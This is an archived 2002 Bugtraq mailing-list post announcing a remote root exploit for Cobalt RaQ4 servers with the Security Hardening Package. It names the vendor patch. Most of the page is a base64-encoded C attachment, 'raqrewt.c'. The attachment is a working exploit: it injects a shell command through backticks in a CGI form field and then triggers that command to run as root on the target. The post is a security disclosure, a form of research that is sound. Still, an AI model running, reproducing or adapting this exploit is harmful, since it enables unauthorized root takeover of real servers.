 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Thu, 5 Dec 2002 13:38:42 -0800 (PST) From: grazer@digit-labs.org To: bugtraq@securityfocus.com Subject: Cobalt RaQ4 Remote root exploit --1070528868-40767661-1039124322=:12790 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, I've attached an exploit that will allow an attacker to gain remote root access on Cobalt RaQ's which have the security hardening package installed (SHP). the official patch for this problem can be found here : http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg Wouter ter Maat aka grazer@digit-labs.org http://www.i-security.nl --1070528868-40767661-1039124322=:12790 Content-Type: TEXT/x-csrc; name="raqrewt.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.33.0212051338420.12790@bespin.org> Content-Description: Content-Disposition: attachment; filename="raqrewt.c" Ly8gUmFRIDQgYW5kIHBvc3NpYmx5IG90aGVycyBlYXN5IHJlbW90ZSByb290 IGNvbXByb21pc2UNCi8vIGR1ZSB0byBhIGZsYXcgaW4gdGhlIFNlY3VyaXR5 IEhhcmRlbmluZyBwYWNrYWdlIEhFSEUhDQovLyBXb3V0ZXIgdGVyIE1hYXQg YWthIGdyYXplciAtIGh0dHA6Ly93d3cuaS1zZWN1cml0eS5ubA0KIA0KI2lu Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5j bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu Y2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2lu Y2x1ZGUgPG5ldGRiLmg+DQoNCiNkZWZpbmUgUE9SVCA4MSAvKiBkZWZhdWx0 IGNvYmFsdCBhZG1pbiBodHRwZCAgDQogICAgICAgICAgICAgICAgICAgdHJ5 IDQ0NCBpZiA4MSBydW5zIHdpdGggc3NsICovDQoNCi8vIGNtcHN0cg0KI2Rl ZmluZSBmb3VuZCAib3ZlcmZsb3ciIA0KI2RlZmluZSBkb25lICJTdGFydGlu ZyINCiNkZWZpbmUgZXhlYyAibWFpbCINCg0KLy8gcHJvdG90eXBlcw0KaW50 IGJhbm5lcigpOw0KaW50IG1ha2VyZXEoY2hhciAqaG9zdCwgY2hhciAqcmVx dWVzdCwgY2hhciAqY21wc3RyLCBpbnQgcG9ydCk7DQoNCmludCBtYWluKGlu dCBhcmdjLCBjaGFyICphcmd2W10pIHsNCmludCByZXR2YWwsIHBvcnQ7DQoN CmNoYXIgY21kWzEwMjRdOw0KY2hhciBjYnVmWzEwMjRdOw0KY2hhciByZXF1 ZXN0MlszMDk2XTsNCg0KLy8gZXZpMSByZXF1ZXN0cw0KY2hhciByZXF1ZXN0 MVtdID0gIlx4NDdceDQ1XHg1NFx4MjBceDJmXHg2M1x4NjdceDY5XHgyZFx4 NjJceDY5XHg2ZVx4MmZceDJlIg0KICAgICAgICAgICAgICAgICAgIlx4NjNc eDZmXHg2Mlx4NjFceDZjXHg3NFx4MmZceDZmXHg3Nlx4NjVceDcyXHg2Nlx4 NmNceDZmIg0KICAgICAgICAgICAgICAgICAgIlx4NzdceDJmXHg2Zlx4NzZc eDY1XHg3Mlx4NjZceDZjXHg2Zlx4NzdceDJlXHg2M1x4NjdceDY5Ig0KICAg ICAgICAgICAgICAgICAgIlx4MjBceDQ4XHg1NFx4NTRceDUwXHgyZlx4MzFc eDJlXHgzMVxuXHg0OFx4NmZceDczIg0KICAgICAgICAgICAgICAgICAgIlx4 NzRceDNhXHgyMFx4NmNceDZmXHg2M1x4NjFceDZjXHg2OFx4NmZceDczXHg3 NFxuXG5cbiI7DQoNCmNoYXIgcmVxX3RtcFtdID0gIlx4NTBceDRmXHg1M1x4 NTRceDIwXHgyZlx4NjNceDY3XHg2OVx4MmRceDYyXHg2OVx4NmVceDJmXHgy ZSINCgkJICJceDYzXHg2Zlx4NjJceDYxXHg2Y1x4NzRceDJmXHg2Zlx4NzZc eDY1XHg3Mlx4NjZceDZjXHg2Zlx4NzciDQoJCSAiXHgyZlx4NmZceDc2XHg2 NVx4NzJceDY2XHg2Y1x4NmZceDc3XHgyZVx4NjNceDY3XHg2OVx4MjBceDQ4 Ig0KCQkgIlx4NTRceDU0XHg1MFx4MmZceDMxXHgyZVx4MzFcblx4NDFceDYz XHg2M1x4NjVceDcwXHg3NFx4M2FceDIwIg0KCQkgIlx4NjlceDZkXHg2MVx4 NjdceDY1XHgyZlx4NjdceDY5XHg2Nlx4MmNceDIwXHg2OVx4NmRceDYxXHg2 NyINCgkJICJceDY1XHgyZlx4NzhceDJkXHg3OFx4NjJceDY5XHg3NFx4NmRc eDYxXHg3MFx4MmNceDIwXHg2OVx4NmQiDQoJCSAiXHg2MVx4NjdceDY1XHgy Zlx4NmFceDcwXHg2NVx4NjdceDJjXHgyMFx4NjlceDZkXHg2MVx4NjdceDY1 Ig0KCQkgIlx4MmZceDcwXHg2YVx4NzBceDY1XHg2N1x4MmNceDIwXHgyYVx4 MmZceDJhXG5ceDQxXHg2M1x4NjMiDQoJCSAiXHg2NVx4NzBceDc0XHgyZFx4 NGNceDYxXHg2ZVx4NjdceDc1XHg2MVx4NjdceDY1XHgzYVx4MjBceDZlXHg2 Y1xuIg0KCQkgIlx4NDNceDZmXHg2ZVx4NzRceDY1XHg2ZVx4NzRceDJkXHg1 NFx4NzlceDcwXHg2NVx4M2FceDIwXHg2MSINCgkJICJceDcwXHg3MFx4NmNc eDY5XHg2M1x4NjFceDc0XHg2OVx4NmZceDZlXHgyZlx4NzhceDJkXHg3N1x4 NzciDQoJCSAiXHg3N1x4MmRceDY2XHg2Zlx4NzJceDZkXHgyZFx4NzVceDcy XHg2Y1x4NjVceDZlXHg2M1x4NmZceDY0Ig0KCQkgIlx4NjVceDY0XG5ceDQx XHg2M1x4NjNceDY1XHg3MFx4NzRceDJkXHg0NVx4NmVceDYzXHg2Zlx4NjQi DQoJCSAiXHg2OVx4NmVceDY3XHgzYVx4MjBceDY3XHg3YVx4NjlceDcwXHgy Y1x4MjBceDY0XHg2NVx4NjZceDZjIg0KCQkgIlx4NjFceDc0XHg2NVxuXHg1 NVx4NzNceDY1XHg3Mlx4MmRceDQxXHg2N1x4NjVceDZlXHg3NFx4M2FceDIw Ig0KCQkgIlx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNFx4 MmVceDMwXHgyMFx4MjhceDNiXHgyOVxuIg0KCQkgIlx4NDhceDZmXHg3M1x4 NzRceDNhXHgyMFx4MzFceDMyXHgzN1x4MmVceDMwXHgyZVx4MzBceDJlXHgz MSINCgkJICJceDNhXHgzOFx4MzFcbiI7DQoNCmNoYXIgcmVxdWVzdDNbXSA9 ICJceDQ3XHg0NVx4NTRceDIwXHgyZlx4NjNceDY3XHg2OVx4MmRceDYyXHg2 OVx4NmVceDJmXHgyZVx4NjMiDQoJCSAgIlx4NmZceDYyXHg2MVx4NmNceDc0 XHgyZlx4NmZceDc2XHg2NVx4NzJceDY2XHg2Y1x4NmZceDc3XHgyZiINCgkJ ICAiXHg2Zlx4NzZceDY1XHg3Mlx4NjZceDZjXHg2Zlx4NzdceDU0XHg2NVx4 NzNceDc0XHg0NVx4NmRceDYxIg0KCSAgICAgICAgICAiXHg2OVx4NmNceDJl XHg2M1x4NjdceDY5XHgyMFx4NDhceDU0XHg1NFx4NTBceDJmXHgzMVx4MmVc eDMxXG4iDQoJICAgICAgICAgICJceDQ4XHg2Zlx4NzNceDc0XHgzYVx4MjBc eDZjXHg2Zlx4NjNceDYxXHg2Y1x4NjhceDZmXHg3M1x4NzRcblxuXG4iOw0K DQpzcHJpbnRmKGNtZCwgIiVzJXMlcyIsICJlbmFibGVkPTEmZW1haWw9YCIs IGFyZ3ZbMl0sICJgJnBhZ2U9b3ZlcmZsb3dcblxuIik7DQpzcHJpbnRmKGNi dWYsICIlcyAlZCAlcyIsICJDb250ZW50LUxlbmd0aDoiLCBzdHJsZW4oY21k KS0yLCAiXG5cbiIpOw0Kc3ByaW50ZihyZXF1ZXN0MiwgIiVzJXMlcyIsIHJl cV90bXAsIGNidWYsIGNtZCk7DQoNCmJhbm5lcigpOw0KDQogIHdoaWxlKGFy Z2MgPCAzKSB7DQogICAgZnByaW50ZihzdGRlcnIsICIgJXMgPGhvc3Q+IDxj b21tYW5kPiA8cG9ydD4gXG4iLCBhcmd2WzBdKTsNCiAgICBmcHJpbnRmKHN0 ZGVyciwgIiBleGFtcGxlOiB3d3cuY29iYWx0LmNvbSBcImlkfG1haWwgeW91 QGFkZHlcIiA0NDRcbiIpOw0KICAgIGZwcmludGYoc3RkZXJyLCAiIGRlZmF1 bHQgcG9ydCBpcyBzZXQgdG8gODEuIFxuXG4iKTsNCiAgICBleGl0KDApOyB9 DQoNCmlmKGFyZ2M9PTMpIHsNCnBvcnQgPSBQT1JUOyB9DQplbHNlIHsgDQpw b3J0ID0gYXRvaShhcmd2WzNdKTsgfQ0KDQpyZXR2YWwgPSBtYWtlcmVxKGFy Z3ZbMV0sIHJlcXVlc3QxLCBmb3VuZCwgcG9ydCk7IA0KDQppZihyZXR2YWw9 PTIpIHsgDQogIHByaW50ZigiIC0gbmFtZSBjYW5ub3QgYmUgcmVzb2x2ZWQh XG4iKTsgDQogZXhpdCgwKTsgfSBpZihyZXR2YWw9PTMpIHsgDQogIHByaW50 ZigiIC0gY29ubmVjdDogY29ubmVjdGlvbiByZWZ1c2VkISBkMGghXG4iKTsN CiBleGl0KDApOyB9DQoNCmlmKHJldHZhbD09NDA0KSB7IA0KICBwcmludGYo IiAtIHRoaXMgbWFjaGluZSBpcyBub3QgdnVsbmVyYWJsZSwgZHdlZXAhXG4i KTsgDQogZXhpdCgwKTsgfQ0KZWxzZSB7IA0KICBwcmludGYoIiArIG93IHll YWgsIHdlJ3ZlIGZvdW5kIGEgdmljdGltIVxuIik7IH0gDQoNCg0KcHJpbnRm KCIgKysgRW5hYmxpbmcgc3RhY2tndWFyZCBhbmQgY3JlYXRpbmcgZXZpbCBj b25maWcgZmlsZS4uLlxuIik7DQoNCnJldHZhbCA9IG1ha2VyZXEoYXJndlsx XSwgcmVxdWVzdDIsIGRvbmUsIHBvcnQpOyANCg0KIGlmKHJldHZhbD09NDA0 KSB7DQogICBwcmludGYoIiAtLSBhdHRhY2sgZmFpbGVkICwgc29ycnkhIFxu Iik7IA0KICBleGl0KDApO30NCiBlbHNlIHsgDQogICBwcmludGYoIiArKysg Y29uZmlnIGZpbGUgd3JpdHRlbiBzdWNjZXNmdWxseSAhIFxuIik7IH0gDQoN CiBwcmludGYoIiArKysrIExldCdzIGdldCBvdXIgZXZpbCBjb21tYW5kIGV4 ZWN1dGVkLi4uXG4iKTsNCg0KDQpyZXR2YWwgPSBtYWtlcmVxKGFyZ3ZbMV0s IHJlcXVlc3QzLCBleGVjLCBwb3J0KTsgDQoNCmlmKHJldHZhbD09NDA0KSB7 IA0KICBwcmludGYoIiAtLS0gYXR0YWNrIGZhaWxlZCwgc29ycnkhIFxuIik7 IA0KIGV4aXQoMCk7fSANCmVsc2UgeyANCnByaW50ZigiICsrKysrIFRoZSBj b21tYW5kIDogXCIlc1wiXG4gKysrKysgaGFzIGJlZW4gcnVuIG9uIHRoZSBz ZXJ2ZXIuXG5cbiIsIGFyZ3ZbMl0pOyB9DQoNCn0NCg0KaW50IGJhbm5lcigp IHsgDQpwcmludGYoIioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKipcbiIpOw0KcHJpbnRmKCJSYVEgNCByZW1vdGUg cm9vdCBleHBsb2l0IC0gZ3JhemVyQGRpZ2l0LWxhYnMub3JnXG4iKTsNCnBy aW50ZigiVnVsbmVyYWJsZSA6IFJhUTQgd2l0aCBTZWN1cml0eSBIYXJkZW5p bmcgVXBkYXRlLlxuIik7DQpwcmludGYoIiAgICAgICAgICAgICBpc24ndCBp dCBpcm9uaWM/IDpdICAgICAgICAgICAgICAgICBcbiIpOw0KcHJpbnRmKCIq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqXG4iKTsgfQ0KDQppbnQgbWFrZXJlcShjaGFyICpob3N0LCBjaGFyICpy ZXF1ZXN0LCBjaGFyICpjbXBzdHIsIGludCBwb3J0KSB7DQoNCmludCBmZCwg c29jaywgY2hrOw0KY2hhciBidWZbMjAwMF07DQoNCnN0cnVjdCBzb2NrYWRk cl9pbiBhZGRyOyANCnN0cnVjdCBob3N0ZW50ICpsaDsNCg0KaWYgKChsaD1n ZXRob3N0YnluYW1lKGhvc3QpKSA9PSBOVUxMKXsNCiAgICAgICAgICAgICBy ZXR1cm4gMjsgfQ0KDQpiemVybygmKGFkZHIuc2luX3plcm8pLCA4KTsNCmFk ZHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQphZGRyLnNpbl9wb3J0ID0gaHRv bnMocG9ydCk7DQphZGRyLnNpbl9hZGRyID0gKigoc3RydWN0IGluX2FkZHIg KikgbGgtPiBoX2FkZHIpOw0KDQpmZCA9IHNvY2tldChBRl9JTkVULCBTT0NL X1NUUkVBTSwgMCk7DQoNCmlmIChjb25uZWN0KGZkLChzdHJ1Y3Qgc29ja2Fk ZHIgKikgJmFkZHIgLHNpemVvZihhZGRyKSkgIT0gMCl7DQogICAgICAgICAg ICAgICAgcmV0dXJuIDM7DQoJfQ0KDQpzZW5kKGZkLCByZXF1ZXN0LCBzdHJs ZW4ocmVxdWVzdCksIDApOw0KcmVhZChmZCwgYnVmLCA1MDApOw0KaWYoc3Ry c3RyKGJ1ZiwgY21wc3RyKSE9MCkgeyANCnJldHVybiAyMDA7IH0gZWxzZSB7 IA0KcmV0dXJuIDQwNDsgfQ0KDQpjbG9zZShmZCk7DQpyZXR1cm4gMTsNCn0N Cg0K --1070528868-40767661-1039124322=:12790--
| |||||||||||||||||||||